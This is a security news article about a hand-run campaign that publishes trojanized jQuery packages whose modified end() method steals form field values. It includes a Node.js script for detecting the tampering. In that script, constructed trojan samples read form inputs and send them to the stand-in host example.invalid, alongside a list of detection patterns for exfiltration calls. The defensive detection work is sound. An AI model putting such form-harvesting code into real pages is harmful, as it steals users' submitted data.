Attackers have again targeted JavaScript developers, this time with a persistent supply chain campaign that distributes trojanized copies of the widely used jQuery library through several channels, including the npm registry and the jsDelivr CDN, according to reports.
The malicious packages carry a modified build of jQuery in which extra code has been inserted into the end method of the jQuery prototype (jQuery.fn.end). When that code runs it harvests the values of form fields on the page and sends them to one or more remote URLs. The Phylum Research Team, which is tracking the campaign, noted that the attackers do not follow the patterns usually seen in software supply chain attacks: the variability between the malicious packages is unusually high, which sets this campaign apart from earlier ones of its kind.
The still-unidentified attackers have been publishing these packages since May 26. The first variant appeared on npm, the default package manager for Node.js, and further variants followed there over the next month. The researchers also found the trojanized jQuery on GitHub and, in one case, as a CDN-hosted resource on jsDelivr.
Although the campaign is small in volume (around 68 packages in total), the attackers have taken several steps to avoid detection. The packages and the files inside them use names that resemble legitimate jQuery artifacts, such as jquery.min.js or close variants. Each package also uses its own exfiltration URL and is published under a freshly created npm username, so blocking a single package name or domain does not cover the rest of the campaign.
What distinguishes this campaign is that it appears to have been run by hand. Rather than the uniform output of an automated pipeline, the packages show a high degree of customization and variation, and they were assembled and published one at a time over a long period, which points to a deliberate, targeted effort rather than opportunistic spraying.
The payload does not fire on installation alone. A victim must install one of the malicious packages, load the trojanized jQuery file it contains into a page, and then call either end or fadeTo. Application code rarely calls end directly, but fadeTo, part of jQuery's animation toolkit, is widely used, and it calls end internally as part of its chain, which is why it also triggers the payload.
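As an added example, not part of the original report or of Phylum's published material, the following Node.js script shows two checks a developer can run against the mechanism described in the two paragraphs above: a static scan that locates the end method inside a jQuery-style source file and flags anything beyond jQuery's genuine one-line implementation, and a runtime check that does the same against an already-loaded jQuery object, with a stub that reproduces fadeTo reaching end through its chain. The sample sources, the stub jQuery object, the hypothetical trojan bodies and the example.invalid URL are all constructed for this illustration and are not taken from the campaign.

```javascript
'use strict';
// Added example: detect a tampered jQuery.fn.end, statically and at runtime.
// jQuery 3.x defines the method as
//   end: function() { return this.prevObject || this.constructor(); }
// so any form access or network call in that body is a red flag.

// Return the text between the brace at openIdx and its matching close brace.
// Brace matching (not a regex) so nested object literals and callbacks do not
// truncate the body. Braces inside string literals are not special-cased.
function bodyAfterBrace(source, openIdx) {
  if (openIdx < 0 || source[openIdx] !== '{') return null;
  let depth = 1;
  let i = openIdx + 1;
  for (; i < source.length && depth > 0; i++) {
    if (source[i] === '{') depth++;
    else if (source[i] === '}') depth--;
  }
  return depth === 0 ? source.slice(openIdx + 1, i - 1) : null;
}

// Find `name: function(...) {` in a jQuery-style prototype literal and return its body.
function extractMethodBody(source, name) {
  const head = new RegExp('\\b' + name + '\\s*:\\s*function\\s*\\([^)]*\\)\\s*\\{');
  const m = head.exec(source);
  return m ? bodyAfterBrace(source, m.index + m[0].length - 1) : null;
}

// Things jQuery's real end() never does: read forms, serialize them, or talk to the network.
const EXFIL_INDICATORS = [
  /\bfetch\s*\(/, /\bXMLHttpRequest\b/, /\bsendBeacon\s*\(/, /\bnew\s+Image\s*\(/,
  /\bFormData\b/, /\bserialize(?:Array)?\s*\(/, /\bdocument\.forms\b/, /\bhttps?:\/\//,
];
const GENUINE_END = /^\s*return\s+this\.prevObject\s*\|\|\s*this\.constructor\(\)\s*;?\s*$/;

function classify(body) {
  const indicators = EXFIL_INDICATORS.filter((re) => re.test(body)).map((re) => re.source);
  const genuine = GENUINE_END.test(body);
  return { genuine, indicators, suspicious: !genuine || indicators.length > 0 };
}

// Static check over the contents of a jquery.js / jquery.min.js file.
function auditJQuerySource(source) {
  const body = extractMethodBody(source, 'end');
  if (body === null) return { found: false, genuine: false, indicators: [], suspicious: true };
  return { found: true, ...classify(body) };
}

// Runtime check over a loaded jQuery object (window.jQuery in a browser).
function auditLiveJQuery(jq) {
  const src = Function.prototype.toString.call(jq.fn.end);
  const body = bodyAfterBrace(src, src.indexOf('{')) ?? src;
  return classify(body);
}

// Constructed sample: the genuine minified jQuery 3.x prototype fragment.
const CLEAN_SAMPLE =
  'jQuery.fn=jQuery.prototype={jquery:"3.7.1",constructor:jQuery,length:0,' +
  'end:function(){return this.prevObject||this.constructor()},' +
  'eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])}};';

// Constructed sample: a hypothetical trojanized end() in the style the report describes,
// harvesting form inputs and POSTing them before behaving normally. Illustrative only.
const TROJANIZED_SAMPLE =
  'jQuery.fn=jQuery.prototype={jquery:"3.7.1",constructor:jQuery,length:0,' +
  'end:function(){try{var d={};jQuery("form :input").each(function(){d[this.name]=this.value});' +
  'fetch("https://example.invalid/collect",{method:"POST",body:JSON.stringify(d)})}catch(e){}' +
  'return this.prevObject||this.constructor()},' +
  'eq:function(e){return this.pushStack([this[e]])}};';

// Minimal stand-in for a loaded jQuery: fadeTo reaches end() through its chain,
// mirroring how the real fadeTo calls .end() internally.
function makeStub(endImpl) {
  const jq = function () {};
  jq.fn = jq.prototype = { end: endImpl, fadeTo: function () { return this.end(); } };
  return jq;
}
const GENUINE_IMPL = function () { return this.prevObject || this.constructor(); };
// Hypothetical trojan body for the runtime check (constructed, never executed here).
const TROJAN_IMPL = function () {
  new Image().src = 'https://example.invalid/c?' + encodeURIComponent(JSON.stringify(document.forms));
  return this.prevObject || this.constructor();
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('clean file   :', auditJQuerySource(CLEAN_SAMPLE));
  console.log('trojan file  :', auditJQuerySource(TROJANIZED_SAMPLE));
  console.log('clean object :', auditLiveJQuery(makeStub(GENUINE_IMPL)));
  console.log('trojan object:', auditLiveJQuery(makeStub(TROJAN_IMPL)));
}
```

Run it with `node audit-jquery-end.js` to see both samples classified; to scan a real file, pass `fs.readFileSync('jquery.min.js', 'utf8')` to auditJQuerySource. The static check is the one to wire into CI or a pre-commit hook, since it works on the artifact before it ever reaches a browser; the runtime check is useful in a page's own integrity code, and it is deliberately keyed to end rather than fadeTo because that is where the inserted code lives.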
Despite the targeted nature of the attack, the broad distribution of these malicious packages poses a significant threat to unsuspecting developers. The potential impact of such attacks underscores the need for heightened vigilance within the developer community and among organizations that rely on these libraries for their projects.
In light of these developments, developers are advised to check the provenance of any jQuery package or file before using it. The Phylum Research Team has published a list of all the malicious packages tied to this campaign, with their publication dates and the npm usernames behind them, together with a list of domains used by the campaign that can be used to identify affected packages and block their exfiltration traffic.
As supply chain attacks against package registries continue to rise, developers and organizations need rigorous controls over what enters their software supply chain. Staying informed and acting on published indicators is how the developer community keeps malicious code out of its repositories and preserves the integrity of what it ships.